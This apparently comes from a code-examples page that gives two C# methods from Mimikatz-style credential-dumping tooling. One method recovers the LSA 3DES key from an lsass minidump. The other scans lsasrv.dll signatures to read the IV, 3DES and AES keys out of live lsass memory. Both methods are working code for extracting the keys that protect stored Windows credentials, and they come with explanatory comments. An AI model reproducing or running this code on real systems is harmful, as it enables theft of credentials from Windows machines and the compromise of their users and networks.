示例#1
        /// <summary>
        /// Recovers the LSA 3DES key from a minidump by following the pointer chain that starts at
        /// the template's DES-key-pointer offset.
        /// </summary>
        /// <param name="minidump">Parsed dump; supplies the binary reader and the system info used for address translation.</param>
        /// <param name="pos">Base position to which <c>template.key_pattern.offset_to_DES_key_ptr</c> is added.</param>
        /// <param name="template">OS-specific pattern carrying the DES key pointer offset.</param>
        /// <returns>The first 24 bytes of <c>hardkey.data</c> of the key structure found in the dump.</returns>
        /// <remarks>
        /// The returned bytes are the key that protects LSA secrets, so any code holding the dump or this array
        /// is handling credential material and should store, log and clear it accordingly.
        /// None of the reads below verify that the resolved pointers land inside the dump; a template that does not
        /// match the dump's OS build shows up as an I/O exception or as garbage key bytes, not as a clear error.
        /// </remarks>
        public static byte[] get_des_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
        {
            // File position of the pointer to the key handle, relative to the matched pattern position.
            long offset = (pos + template.key_pattern.offset_to_DES_key_ptr);
            // Despite its name, ptr_iv holds the DES key pointer throughout this method, not an IV pointer.
            long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);

            // Second argument 0 is SeekOrigin.Begin: positions are absolute file offsets.
            minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
            ptr_iv = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader);

            // Translate the virtual address stored in the dump into a file offset of the KIWI_BCRYPT_HANDLE_KEY.
            ptr_iv = Helpers.Rva2offset(minidump, ptr_iv);

            minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);

            byte[] h3DesKeyBytes            = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
            KIWI_BCRYPT_HANDLE_KEY h3DesKey = Helpers.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);

            // NOTE(review): the KIWI_BCRYPT_KEY81 is read from the bytes directly after the handle struct rather than
            // by resolving the handle's key pointer, so this relies on the two being contiguous in the dump — confirm.
            byte[]            extracted3DesKeyByte = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
            KIWI_BCRYPT_KEY81 extracted3DesKey     = Helpers.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);

            // 3DES uses a 24-byte (3 x 8) key; hardkey.data may be longer than that.
            return(extracted3DesKey.hardkey.data.Take(24).ToArray());
        }
示例#2
        /// <summary>
        /// Locates the LSA initialization vector, 3DES key and AES key in lsass memory and stores them in
        /// <c>this.iv</c>, <c>this.deskey</c> and <c>this.aeskey</c>.
        /// </summary>
        /// <param name="hLsass">Handle to the lsass process that <c>Utility.ReadFromLsass</c> reads through (passed by ref).</param>
        /// <param name="lsasrvMem">Base address of lsasrv.dll inside lsass; every offset below is relative to it.</param>
        /// <param name="oshelper">Per-OS signature and displacement constants (<c>keyIVSig</c>, <c>IV_OFFSET</c>, <c>DES_OFFSET</c>, <c>AES_OFFSET</c>).</param>
        /// <returns>0 on success; 1 when the key/IV signature is not found in lsasrv.dll.</returns>
        /// <remarks>
        /// Only the signature search is checked. Every later ReadFromLsass result is handed straight to
        /// BitConverter / ReadStruct, so a short or null read (offsets that do not fit this OS build, a protected
        /// lsass) fails with an exception rather than a non-zero return. The populated fields are live credential
        /// encryption keys and should be treated as such by whatever consumes them.
        /// </remarks>
        private int FindKeys(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper)
        {
            long keySigOffset = 0;
            long ivOffset = 0;
            long desOffset = 0, aesOffset = 0;
            KIWI_BCRYPT_HANDLE_KEY h3DesKey = new KIWI_BCRYPT_HANDLE_KEY();
            KIWI_BCRYPT_HANDLE_KEY hAesKey = new KIWI_BCRYPT_HANDLE_KEY();
            KIWI_BCRYPT_KEY81      extracted3DesKey, extractedAesKey;
            IntPtr keyPointer = IntPtr.Zero;   // never read in this method

            // Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
            // (max_search_size is a member defined outside this method).
            keySigOffset = (long)Utility.OffsetFromSign("lsasrv.dll", oshelper.keyIVSig, max_search_size);
            if (keySigOffset == 0)
            {
                Console.WriteLine("[x] Error: Could not find offset to AES/3Des/IV keys\n");
                return(1);
            }

            // Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
            IntPtr tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET);

            // The 4-byte displacement is read as signed; it is relative to the end of the instruction,
            // which is why 4 is added before the displacement below.
            byte[] ivOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            ivOffset = BitConverter.ToInt32(ivOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET + 4 + (int)ivOffset);

            // Read InitializationVector (16 bytes)
            this.iv = Utility.ReadFromLsass(ref hLsass, tmp_p, 16);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET);

            // Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
            byte[] desOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            desOffset = BitConverter.ToInt32(desOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET + 4 + (int)desOffset);

            // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            byte[] keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            long   keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] h3DesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
            h3DesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);

            // Read in the 3DES key by following the handle's key pointer
            byte[] extracted3DesKeyByte = Utility.ReadFromLsass(ref hLsass, h3DesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
            extracted3DesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);

            // The whole hardkey.data buffer is kept; it is not truncated to the 24-byte 3DES key length here.
            this.deskey = extracted3DesKey.hardkey.data;

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET);

            // Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
            byte[] aesOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            // NOTE(review): read as UInt32 whereas ivOffset/desOffset use ToInt32. The (int) cast below yields the same
            // bits in an unchecked context, but a negative displacement would throw under checked arithmetic — confirm intent.
            aesOffset = BitConverter.ToUInt32(aesOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET + 4 + (int)aesOffset);

            // Retrieve pointer to hAesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] hAesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
            hAesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes);

            // Read in AES key by following the handle's key pointer
            byte[] extractedAesKeyBytes = Utility.ReadFromLsass(ref hLsass, hAesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
            extractedAesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extractedAesKeyBytes);

            this.aeskey = extractedAesKey.hardkey.data;

            return(0);
        }